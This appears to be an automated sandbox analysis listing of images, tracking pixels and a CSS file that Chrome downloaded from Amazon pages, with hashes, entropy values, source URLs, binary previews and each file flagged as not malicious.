                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQaqrs...46t.."235B..........#$CDRbu..%ES...T...................................................!QR..12A..."r..B............?..Z.(........GN.{......{.#A($.w5.|/)......}.|.......>....7....b......?.T....S.:OK.yKF.d...|..m.W.&....6.....s.{.ih......#.*....b....k0jV.g....N.`.b..~......P.N..s?h..<N..[.......J>.2.....8h..Y..>e...3.d.m9f.x...T.B>..*..ZF....G.U..z..hp..F_!._...8.O}.,[....G.C.H.t.c...././.>...!..QHC...>.=../=.L...6.....~..)...........g4O)..mw..-..4..&..b.a2a..3.=E[YR..Z@.J.y."p:.|..N.k.....>....d.V.w.N7.......m.^I.1].OV.EX#.A.n.9...bp...,...H{.....u.k..X..)L6J.2.>.5G?..p.V.3....N.V....7.vt.u..'PA..U.su,~........2....w.#.;M..~...:,..+.*..d...S.\.s.wI.).....I....B.V....|Z.9O.x.....X0.Q......u...#_.:....U-T....2...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5352
                                                                                                                                                                                                                                                                Entropy (8bit):7.918266697438741
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TW4gYdyTJBP0XZOGszoFNqIPFNwcZUmbzZByADqP7lVEUP5rSlT:jdy9BP0XAzoFNqIPQDkNUxlVEUP5elT
                                                                                                                                                                                                                                                                MD5:82389E8686D983207D46451283CF3F9B
                                                                                                                                                                                                                                                                SHA1:E021F9A68A30A36A8204C7F7A0A53ADB96D9B241
                                                                                                                                                                                                                                                                SHA-256:BEBAE55CE6F0E9A54E09B7D03F3544C721F41C5EC04AFA7460C690DD0DA0707F
                                                                                                                                                                                                                                                                SHA-512:FB86C446360432B00D73E8B2AA8E9460B835197AA19598F5A5934D20F7C52E8A13D53A633F34C2BA2F5C0F5CDC6B63FC79C3BB4C45DB565BFD559E92E6700365
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61P62lC5OHL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.."AQ#23aqr..$Cbs..BRS........&4c...%tD................................................1.!A..............?..t.(..(..(..(..(..(..(..t..I.*.$.....0PI8.......K..4.-.8...4U.4.U.!.,.`..l/...X,2b...\...\.&G<.*}.....2.u.L.q''|.n!..}...:>.t.!.t9..j....i...U.../.e.O.R..R......;?._...Q.e.r...+K........[.I...].@.<U.t.R..R..R..R..W......a[....0.<Q...&.q}........*.<...kp..;..<)/....[..V&..R,.kX.5K.r...v.<.......k7"9.B..P~..~.Yh.Y.(...9..i:...B.4=\..$H.....-..6.G.o.c....~.j./...v..V..e2!`....<2.c....P)JP)J.zT.-Q...!..`pTw..a.{~M........K...$...g.q.*.*.E.Y[...w.u......X...<...#.$.$....2..nMf.I....k;..F....F9..`.{f...|..Vw(A......Pd)JP)JP/oa..[..$q)fs..UW.}M6.4...s..{....|....J. .[..mP..DD.xX.....3x...c....>..vL..G..`............7D............C.'.y
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1193%26pc0%3D1278%26ld0%3D1278%26t0%3D1723469068644%26ctb%3D1:4781
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x39, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3362
                                                                                                                                                                                                                                                                Entropy (8bit):7.790232983607646
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:YAwgOoAWDtOD8+YaW8VmDtDku0MLpjvzv/6:YjwA2q8+VVytDeqvv/6
                                                                                                                                                                                                                                                                MD5:CBCFF75C6AE941CF0B90F4FA99A1DE2D
                                                                                                                                                                                                                                                                SHA1:CDBC945663B606E0817F0CCFF7D1AC6835E75145
                                                                                                                                                                                                                                                                SHA-256:BB2FABD3FC8B4CEDD82CD247D4F3FE73DF7A648E7F2A71AA8B844F42C2E3A11D
                                                                                                                                                                                                                                                                SHA-512:02683B00AE00396E5D4E7F5D74916DFBD1731FE208832DBA447F21A9E792F8731AB5F348F0EB8FC40ADBC000BF52E622E8AC234710AA1FAA7106F5C45F34F6C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/39/UAE-hq/2022/img/Digital_Devices/Alexa/Evergreen/XCM_Manual_ORIGIN_1438174_4757317_400x39_2X._CB635058224_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................'...."..........0...................................................................T.I 'H*V..k..v..............H.9._....f.jB.c.4....o....[M...@.....3b..x..|.&.M.t~k:m....W./I5^..0.....;?-:..D........Z.<.9'....PW1f.5...D.^........................t>..?...-...............................!0."#6P $345.............Q.$....4y=<..i..2....$.......M\k.. .c....L+VG..S.q.{..M<.P..;...$5........Eg.,.7..&..@...9.0z...s..pR.r..Z../.....J2.....2..R..\K...A.l.Xz.Al.}h...^U.~A......E..8....W..A...+U..:...@._<.YUF.....e.).:............j^.[.*lj.t)7C..K!...Oo?..A~C....N....[Y....v..F...~...j|y.. u....x..........e.....NNw.;.[:.V.....V.....S_.~...vfy...6.G.....%."e......(....5..K..7 .x.-....4...^D.....3.)....|..Z.+..W....gK9..I.........n..C.?.../.........}k..a1..B.S...R....y....o."..f....o)W.'.:.3.d...?.s..B[.b..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D3567%26pc%3D7461%26at%3D7461%26t%3D1723469074827%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7461
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3701
                                                                                                                                                                                                                                                                Entropy (8bit):7.8739039855495765
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TGACssyf7Ipycfj1hgLTUB+p+I5pnZjzBEXpJgFb+O:G9pffITco+KxZjzBajgQO
                                                                                                                                                                                                                                                                MD5:61671ED1C42A1808D8E2F44AF2C20D43
                                                                                                                                                                                                                                                                SHA1:6D9AABF558BB48EADC9997D952B94A46968125AB
                                                                                                                                                                                                                                                                SHA-256:3143C95096B0531975B61FC8AF1FD5C4C92C773968800973EC28D183A4977D60
                                                                                                                                                                                                                                                                SHA-512:240494ADC2FEF7A561DBD01E85B5896CC301290A18A55AF2F7F69AAE05818C88218167E16D92A559A540DD908C205DE6AAAD4873CC61604F277DBEC29A10EDA8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71SFHwsXvbL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................Q...1Aa..!BR....."#2qr....5bCSt......s.................................................1.!..#2A."$Q.............?..D@DD.D@DJ..hb|..68.9..p..%..t.+C.'lw...~...h.......LL.9....(.%U_%C.,.......8.J...[.OP.&..T,..4.~.....u[.KjrH...1..q.+V.Bz_U.Go....1W.6.U.wkK.WM.1`.A..Z..]7.........)...M.{j.v...I..z.'=6.)....oq.B.C8.H..y..{.n.s.d....W...g}......|n.k.8.......`.~..d.[W.......3........wb-s.9..2.i.=.}I?..[.rZ.Y."".DD.D@DD.D@DD.D@D_-.B.:.jj...M%.)......l.W...7P..y..J.,..J...N_R&.g...7+ya..9MVf.........y..._[.....w.....=w....Y&S....6.+.e.;..(R.gdk:......y..X...7>.#......%Qz..@S".wx..}.Z.4|...E..e..Vm..A.ETx.J~.\.. %..&..5-~.".9..C..v-...u..f.......u.M-.-..H""." ""." "".....y.........n..........UY.kn.b.s5q..,.>G^..I&.I.'........G
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8894
                                                                                                                                                                                                                                                                Entropy (8bit):7.961744028974025
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:tfll98fSDoIQJNuCEUQahRmS9HvZupna9sk5k/g+/y8U61C:HP8fSDoI6UU51HBuJaUK8U6s
                                                                                                                                                                                                                                                                MD5:B4DF342E5FBA0EF84E99D771A0E6547A
                                                                                                                                                                                                                                                                SHA1:EC971AEAC522128119EC4F341B64414A079C9235
                                                                                                                                                                                                                                                                SHA-256:B0A0A67FF0FF96122A476751027B8405D397C2D22D3CB8C66419035D47C08240
                                                                                                                                                                                                                                                                SHA-512:649F016A5DE3C58672B117D0396D91864922E3A1F2533CD9025171BC83A09452B603945086CFD195B269E88CD4827FFFF6A06773BB3DB074F07EB6061FD8CB89
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1..AQa"2q..BRr...#b...3CS....$4s....Tc....................................................!1.2A."Qaq..3....5...$%B.4..............?..*RIJ.*RIJ.+.`:.I/.*=.I...R....}....Q..L\....v..J....C...#.s.f...m...eg..Z....W....#....Hk....+kg...Y...$.(xvFYrs.S...u90j.c.da.]!Q./S...u.5...y..1.k%s.kGj.P..H.m........xAg.T.......gq...&:.9..I!I....#.. .#.R.T...*V..;..s.6.l}..7.....wK.0..#QE.3_.....I....;.E..Mor..W.p.=|...i....Yy......65X.c`...vU..wR...el....m...&.N..*.otr.q:..-..89.....GI..I3.nW..c`%........$y..+..t....~&.;A.).o........b...!(s..R|.i..q].....Y....?<.2.T.r.[.a...._j.vS..d|.`...MJ..H.#..4M.....o..Y.W..F2....A.d?.4T..O.H.....9.?..[.pkZ.l.e.Eh..<.'..........~..t..nJ...##...^:.J...Ye.L>...@=..V7.p..`R....."._...o.h.Ho.0....MZ..*T.I%*j.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 101x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5356
                                                                                                                                                                                                                                                                Entropy (8bit):7.908465068720227
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TX3k6Y5JPsgmzvBeLbwFxJPEYqxNz0REEUBVBfjHFvrjkaR:jlYLEjzv4LbQPgiRRQNHFHkaR
                                                                                                                                                                                                                                                                MD5:68814DDB4ED18117278DCE17461F51B8
                                                                                                                                                                                                                                                                SHA1:79EC3F002191AB56D2669CAC17A0D3E8434E7B6D
                                                                                                                                                                                                                                                                SHA-256:D6A0D07E2F96FB15C3CC7AEF3471D4462B93F8E32A440DBAF419521D8847A860
                                                                                                                                                                                                                                                                SHA-512:7D2B4CE76BF7D3B55CA439CD054681A9CED27B3D724C9C17A49187AABA15825F1164DFB2DED3E562E1B95D6418AD5CA1BA3B3F44F50FABAEA08546F8F2FC8F45
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61pYmhJ35NL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........e..".............................................................!."1..A2a.#Qq...RBr$3Cs..................................................!."1A.2aq..B...#Qr................?.....h...h...h.._.f.W.I..W4...~{....kzv...7.k.~n...J...B.<...7...e.....X...2..W4.U.aj5z..Q..`V.HE..e.......[R.w....F...i..(."u..sJ.I?a...<..@..`8.(.......r61.H....#."@..7.>j....H.t..,..(...(..t.WN.E>..ym.t.MPQ..h...h...+..........b.4.....4.V.@.......V.....Q...f...b.gq...W..<......{.~...b.F.i..5Y.u.....c..l..>....j{.d.LY.l9..7w7...y....>*....aD.......x.g.dk...x../.$4.MXA..h...h...h..#$.icm..Q...8b.B(..a...]Y5..m..s.`.{+td...I>.)VK..O.U<.?V4.!....P<.....I...M.q....u\....@w.p..o..._'..P^..t.L.ot.xd.@Rl......qw..N......y..v.i.. .M4..M4..M3..`..,U...M..}..&...E}..<L....8b\0.......6ub.G..V.CF.H.....E%..;..n.8.K.t..G>.O..]ro..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7418
                                                                                                                                                                                                                                                                Entropy (8bit):7.754520495970849
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:ThtTuTaInWKIg3YiO1zIiNU/yID+xgGjjjlL18V6I1Hlrhk1TZd87zeIIbGKk3Lb:XTu+IWXE+5zV1kn9GVdRISOBJ4w
                                                                                                                                                                                                                                                                MD5:0E4A588AB438532CECDAB3CFE9FB602F
                                                                                                                                                                                                                                                                SHA1:9B69ABD4266D971A75BAEEF7158D27784E775E9F
                                                                                                                                                                                                                                                                SHA-256:E4F917E3E6394115A2266BC30A412F3601F1D8E56B8426BCCC1D5BF06F3A6381
                                                                                                                                                                                                                                                                SHA-512:BAF5BE233653475BF2B802A170D60572A9931E8DDE47DBC8410871B379E43E36EF035EC5C06AD7E3528384649C08A2E2984BB77229012B4DAE346FE5909FA16A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/510+M7CziqL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5............................................................................q.,.R./.....U..'.................x{o.5....*H#..a...K..~.'qe.?...9&....A^...............)*....u6.n..R.....E..;J|...:o.....t.K...'.8.F..Yf...................z...U.....l...C.&[oD..#*#..O.h.U.F....fy.....R.r..................{`..2.H..u.'U...H.'0.]...~.{x...3~z..7..G.....>...................W3.....O...YfSFn..y....`X...1.....{...T.....'.j.g..g.Z................=.q.....&...R.....#...6an...>>.t.2..?7....;.w*...m.i..........................A~...i.t......M[:2...Q...~................c..2.N..^.........Z...oz.."...Zd.e].T.m].,................>a.BE.2.....a.....1.O..g.?<w!..k.:...M\..W.Y.................gj...s.Pk.....T$..s7..f2...o...C:^p]..................{.)>v.....2...&u...`...5.YFNZ................y.....'.p&..nk..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (488), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):488
                                                                                                                                                                                                                                                                Entropy (8bit):4.88444705146119
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:mMsa9t9ELk6lAJRpo9SscllcW3ODLAh5JTwt:mMskt9cpy9sUlVnkt
                                                                                                                                                                                                                                                                MD5:E9411D586D9D5F7BD6E7CC40A4B687C8
                                                                                                                                                                                                                                                                SHA1:D70B086D7A874DFA90B82195FB67FC31AC5EC6A8
                                                                                                                                                                                                                                                                SHA-256:4201E1EDEA2F8F914B104E1302C3319CE9156E83E1BD816FEBC3B4961D5661F2
                                                                                                                                                                                                                                                                SHA-512:2853BF372DDC23DDE7F0C85BCA0CD3C6CAB92CD5AE47842C9AE94F98CF10E91B7F2F06B9ED8C78DBE9D8E7D65D491D1ACAAB377A49E173EA25A84405DADE5F56
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01lVd4YiL+L.css?AUIClients/BuyBackCartAssets
                                                                                                                                                                                                                                                                Preview:#buyback-icon-image{max-height:none;margin-top:-5.9rem}.cart-exchange-icon-image{height:1.9rem;width:1.9rem;overflow:hidden;display:inline-block;vertical-align:middle}#exchange-sheet-card-content{box-sizing:border-box;padding:.625rem;background-color:transparent;border-color:#e7e7e7}.exchange-sheet-content-body{padding-top:1.25rem;padding-left:.625rem;padding-right:.625rem}.buyback-sfl-sheet-content-body{padding:.625rem}.buyback-proceed-to-sfl{background:#FFD814;border-color:#FCD200}
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26ctb%3D1%26m%3D1%26sc%3DPAGVV1BKBQP3X0S0NFTP%26pc%3D1527%26at%3D1527%26t%3D1723469075545%26csmtags%3Dcsm-feature-touch-enabled%3Afalse%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:1527
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2864
                                                                                                                                                                                                                                                                Entropy (8bit):7.825366417868477
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6kHx3N3TsHzdZfNe2lEDQ8nxGh4KWfX9NJDHFLlkBVNovu8bbbbbD:TMHTjsHvNeSqQ8nxFKWfFDdlkzN4Rbbf
                                                                                                                                                                                                                                                                MD5:3531AC69666646AC7B337B6E27651AC1
                                                                                                                                                                                                                                                                SHA1:6A889B3974DFFCA4A7BB10E7948CFD8932C8C664
                                                                                                                                                                                                                                                                SHA-256:B8CEB8727FDF03B6CB42F3FEC61C5BC819A89CF1C2797E79BC1344BDC241FF93
                                                                                                                                                                                                                                                                SHA-512:BDF212C15659B5C11FD4F36808C6F370B32839D611157CD1D46740F0CF6FEF62402ED9B61C89A5E16AC047D36595B795126213A65B9F18EDEA86586FF682D491
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!"1AQ.2aq...Rs.....Bbd.#35Sr..$%4ct.....................................................!1.2Bq."4A...Rr.............?..8..........................................TP.7.H.G@..T.'/q.*....|...I.r%.6o...#./q.1.M..z........W.2.DF..:O.o#..y.....j5...lY...rX........}_.....x.g.7......o#>./.O.h.....T9M.8C.`.b..m........-......P..x........$hp.*~.R.....S..v^..1{&.*..f..y..Q0.:....N.....h.=_""IX..................g.%....nO....s.Q.L..u.]..+.f!UUF..OP.:.=......@..0....vT~lv....|.......t#l\7.>5g...[.w....I.n.d.sy...G......&R.....g.....Y.;..e.8...}..o_..ru..........Qw......w:~..<.04.9u.T..o.......r.. ..V...^.......J..)=....23 ..$e."pA:..UK0..*...`.......'U.77...U......... .Z...t...%..;K.kYk..E..D~.........Y.,_z..|%...0.u...R...=z.G0....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 1242x450, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):75195
                                                                                                                                                                                                                                                                Entropy (8bit):7.946534329781733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:RXSWGoABiLlDQojo7D2HlNDMEYXOTKh78THTbmBswUzDk:A58ZHo7DArxQOmAHG+wUM
                                                                                                                                                                                                                                                                MD5:51C7A37369F3ED4CCB7A6D978D6E1985
                                                                                                                                                                                                                                                                SHA1:5392F7A1106DB043FEFD1BA06E40FFF2828191E9
                                                                                                                                                                                                                                                                SHA-256:361D4833A692EF980C9232401EB1F063F7675D158B3862BE09ED6CA3FDAF00D8
                                                                                                                                                                                                                                                                SHA-512:858B181A1F2D906EC1EF3D66F5ADC4D49037BD3AA181B6B382CD04FE2654F163A26D2A7EF03AD7DCF13AAA8F0C66F9B11506A9C898364A89386A3996EEFD2FAD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/grocery/SSW2022/FEB/AE_MH_CN_DailyEssentials_En_1242x450.jpg
                                                                                                                                                                                                                                                                Preview:......Exif..MM.*.......i...........................({"systemName":"Freeway","id":"XCM_Manual_1333288_AE_MH_CN_DailyEssentials_En_1242x450_62250f37-4d8f-4ca3-8029-f242b1e6c9f3.jpg"}.....Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6698c714-4270-4d04-aaa6-be4b260bfa70" xmpMM:DocumentID="xmp.did:9AB536AEB67C11EBB17BEC042ECF912E" xmpMM:InstanceID="xmp.iid:9AB536ADB67C11EBB17BEC042ECF912E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:de39bb07-faff-48c1-b476-2ef570d6b8e7" stRef:documentID="adobe:docid
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 144x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6007
                                                                                                                                                                                                                                                                Entropy (8bit):7.922214735805358
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T7bgdLLzYtYkm72LUi3SxV9jrl1U7Be2+KRituICRR5vxhhPCJDtQjwZ1:DgdLzeo2LU/9nlCbCuImR5rhsDiwD
                                                                                                                                                                                                                                                                MD5:C060A4EC5B66565E7A25F58BCC7D57B8
                                                                                                                                                                                                                                                                SHA1:7C7223EF827F8CA30700CBEA33DDBD04729D16AE
                                                                                                                                                                                                                                                                SHA-256:A907835E2075DED24A1E92414CB88E266AFA1C44A88BB02F93EDF5A41C8B1AD8
                                                                                                                                                                                                                                                                SHA-512:BD4CF7052A41CD8C086CDE4898437E898C4F6E2581D5D8EC63BC57651DFEA716C6742BAA55D083B37D6E201A753808631563264CD0087DF08D95E68409E7D7C5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!...1Aq"2Q.Ra...#....$3bcr.....BCS...................................................!1.2Aq.."Ba.............?..t.(.)J.JR.R.....}..Y..7W..{.H.0.i.d..)....x.a.E.Y.U..N...I....b].S.."..Z.WY#..%..A.;e.W$3...o.o..@.9.K.....".c......~<.....z..}6.....t+.@..I..I....#,.E....;!.g$|*.?u...6.....4.m..eQu..t.Q.7M.J...1n=...P..#.Z.F|.7.).`H.d..x?[i..S..O.;.~`.2.=T.$+.......JR.R....(.)J.JR.R..+..ui..o...>."....#<...S..d>..hg..P@...b@.&T..~T.f*X......n...L.,mcH.L..Kvw.F.Vs.".r*..2.U.....2B.L..x ...zX.[..s.k0^%......~xm..h...l.V8...[d.....Ydl.........j...j....MN1."...<.c..I`3_...j.....j..._........P.~\2.U.Y.k.O...]E..WG....+,.h..I...e.0.F>.m:..ZRY.5.......D.........+.....t.}:.b..d.........hA..,.Q..l...I.)JU.E)J.JR.R....(.5mR.".....o...d..N..?A
